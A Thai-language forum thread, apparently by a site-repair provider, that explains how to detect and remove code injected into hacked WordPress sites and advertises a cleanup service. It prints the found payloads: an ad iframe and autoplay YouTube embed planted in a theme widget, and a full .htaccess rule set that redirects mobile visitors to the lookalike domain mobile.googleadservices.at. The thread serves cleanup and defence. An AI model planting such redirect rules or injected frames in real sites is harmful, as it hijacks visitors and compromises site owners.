Author Topic: wordpress โดนฝั่ง สคิป redirect googleads หรือ youtube.com หรือ googleadservices  (Read 4645 times)

golfreeze

  • Administrator
  • Hero Member
  • *****
  • Posts: 2035
    • View Profile
    • นั่งสมาธิ สติปัฏฐานสี่ พาเที่ยววัด แนะนำวัด แจกcd ธรรมะฟรี
    • Email
ให้ลองเข้าผ่าน browser "firefox" แล้วใช้ตัว firefox debugger > ตัวตรวจสอบ

เกิดจากตัว theme มีจุดรั่วให้สามารถอัฟพวก iframe ฝั่งเข้ามาในระบบได้
วิธีการคือเชคcode ใน menu "widget" > "Text"  ของ theme นั้นๆ แล้วทำการค้นหาดู code "googleads" , "youtube" หลังจากเจอก็ทำการลบ code ดังกล่าว แล้วทำการ save

<center>
<iframe align="left" frameborder="0" height="280" scrolling="no" src="https://googleads.g.doubleclick.net/pagead/ads?ad_block=2&client=ca-pub-6219811747049371&format=300x250_as&output=html&h=250&adk=3611498851&loeid=901642%2C942637%2C946008%2C954812%2C9407664%2C9408101%2C9408134&channel=yt_mpvid_K5RPmvR-NqYRDgax%2Byt_cid_23128181%2Bivp%2Byt_fp_wl%2Byt_no_ap%2Bytdevice_1%2Byt_no_cp%2Bafv_user_id_U90cEcCGGi__cY2fK5IbuQ%2Byt_inline_install%2Bytel_detailpage%2Bytps_default%2B0854550288%2BVertical_211&host=ca-host-pub-5661160663989943&ht_id=8143382&ad_type=image&ea=0&alternate_ad_url=http%3A%2F%2Fwww.youtube.com%2Fad_frame%3Fid%3Dwatch-channel-brand-div&flash=16.0.0&hl=en&url=http%3A%2F%2Fwww.youtube.com%2Fvideo%2F6pViDULLOVY&video_doc_id=yt_6pViDULLOVY&dbp=ChY2MTc3Nmc4MFNhYzNvem8wRDRobWlnEAE&lact=-1&yt_pt=APb3F2_DfyuEgHbYDvwenfl4z9_3rYMsSj4jXrJxGLMnsoXnHbAhn3CwryVhgtYz-pQFvCGOZzvupK1ElJNawp0uMBXEa1kiE17Dnb2abYTPbRZa5UHIFk3uAtlcaynfrxnjfOczKdJN86kkC8LN&dt=1427049316865&bdt=6703&shv=r20150317&cbv=r20110914&correlator=6759326548722&frm=20&ga_vid=514479999.1427049317&ga_sid=1427049317&ga_hid=1262702782&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=768&u_w=1366&u_ah=728&u_aw=1366&u_cd=24&u_nplug=4&u_nmime=43&dff=arial&dfs=13&adx=914&ady=75&biw=1349&bih=634&oid=3&loc=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D6pViDULLOVY%26noredirect%3D1&rx=0&eae=2&fc=24&brdim=%2C%2C-8%2C-8%2C1366%2C0%2C1382%2C744%2C1366%2C634&vis=1&rsz=0|8||&abl=NS&ppjl=u&fu=16&bc=1&ifi=1&dtd=113"
width="336"> </iframe>
</center>

<script>
<object width="420" height="315"><param name="movie" value="//www.youtube.com/v/6pViDULLOVY?hl=en_US&autoplay=1" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed src="//www.youtube.com/v/6pViDULLOVY?hl=en_US&autoplay=1" type="application/x-shockwave-flash" width="420" height="315" allowscriptaccess="always" allowfullscreen="true"></embed></object>
</script>

golfreeze

  • Administrator
  • Hero Member
  • *****
  • Posts: 2035
    • View Profile
    • นั่งสมาธิ สติปัฏฐานสี่ พาเที่ยววัด แนะนำวัด แจกcd ธรรมะฟรี
    • Email
Packetlove.com รับแก้ไข กู้ wordpress ที่โดน hacked
ปัจจุบันนี้ การทำเว็บไซต์ผ่าน CMS: ที่ชื่อว่า wordpress มีการใช้งานอย่างแพร่หลายมากขึ้น
เพราะมี theme ฟรีต่างๆ รวมถึง plugin ที่ถูกเขียนและพัฒนาขึ้นมามากมาย เพื่อความสะดวกสบายในการใช้งาน รวมถึงหาฟังค์ชั่นที่ต้องการให้เว็บของท่าน

แต่ใครจะรู้ได้ ว่าในเบื้องหลังของฟรีที่ให้มานั้น ก็แฝงด้วยสคิปอันตรายต่างๆ รวมถึง โฆษณาอันไม่พึงประสงค์

วันนี้ทาง แพ็คเกตเลิฟ เลยจะนำเสนอวิธีการเชคระบบเบื้องต้นเมื่อระบบ wordpress บนเว็บของท่านโดน hacked

1. เข้าเว็บผ่านเครื่องคอม แล้วถูก redirect ไปหน้าอื่น หรือวิ่งไปหน้าโฆษณาต่างๆ

2. เข้าเว็บผ่านเครื่องคอม เข้าเว็บได้ปกติ แต่ถ้าเข้าเว็บผ่านอุปกรณ์ smart phone แล้วโดน redirect เว็บไปหน้าอื่น

3. โดนแฝงโคดมาในหน้าแรก โดนฝั่งผ่าน widget

ปกติทางผมจะช่วยสแกนพวกจุดรั่วต่างๆ ให้กับเว็บลูกค้าอยู่แล้ว โดยใช้ tool ของ firefox ที่เป็น inspector tool ช่วยในการตรวจสอบได้ครับ หรือแม้กระทั่งตรวจสอบระบบเว็บเซิฟเวอร์ของท่านว่า มีจุดไหนที่ให้ hacker แฝงโคดเหล่านั้นเข้ามา หรือจะถูกอัฟขึ้นผ่านพวกไฟล์ .htaccess แล้วทำ redirect url

วิธีคือ พยายามดูใน path ต่างๆ เช่น path “wp-content/uploads”  , “wp-content/themes/” ว่ามีการปรับสิทธิ์ให้เข้าถึงแบบ 777 หรือเปล่าคือให้ ทุกคนมีสิทธิ์อ่านเขียนได้ทั้งหมด ซึ่งถ้าเป็นลักษณะนี้ก็จะอันตรายมากครับ ควรปรับสิทธิ์ให้เหมาะสม หรือเขียน .htaccess กันไว้ ว่าให้อัฟโหลดได้เฉพาะพวก ไฟล์รูป .jpg , .png , .gif เท่านั้น

สำหรับท่านใดที่กำลังสงสัย ว่าโดนของเข้าซะแล้ว และต้องการให้ทางเราทำการตรวจสอบ หรือ ตราจเชคให้ก็สามารถแจ้งเข้ามาได้นะครับ ทางเราจะช่วยค้นหา และทำการให้คำปรึกษา เป็นอย่างดี เพราะเข้าใจว่า เว็บไซต์ของท่านมีข้อมูลที่สำคัญต่อธุรกิจของท่าน

Email : support[at]packetlove.com

Line : Golfreeze

Tel : 086-4150926

golfreeze

  • Administrator
  • Hero Member
  • *****
  • Posts: 2035
    • View Profile
    • นั่งสมาธิ สติปัฏฐานสี่ พาเที่ยววัด แนะนำวัด แจกcd ธรรมะฟรี
    • Email
โดนฝั่งสคิปใน .htaccess
จะทำให้เวลาเข้าเว็บผ่านมือถือ แล้วโดน redirect ไปเว็บแปลกๆ เช่น mobile.googleadservices.at


RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|IOS|Ios|Ipad|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://mobile.googleadservices.at [L,R=302]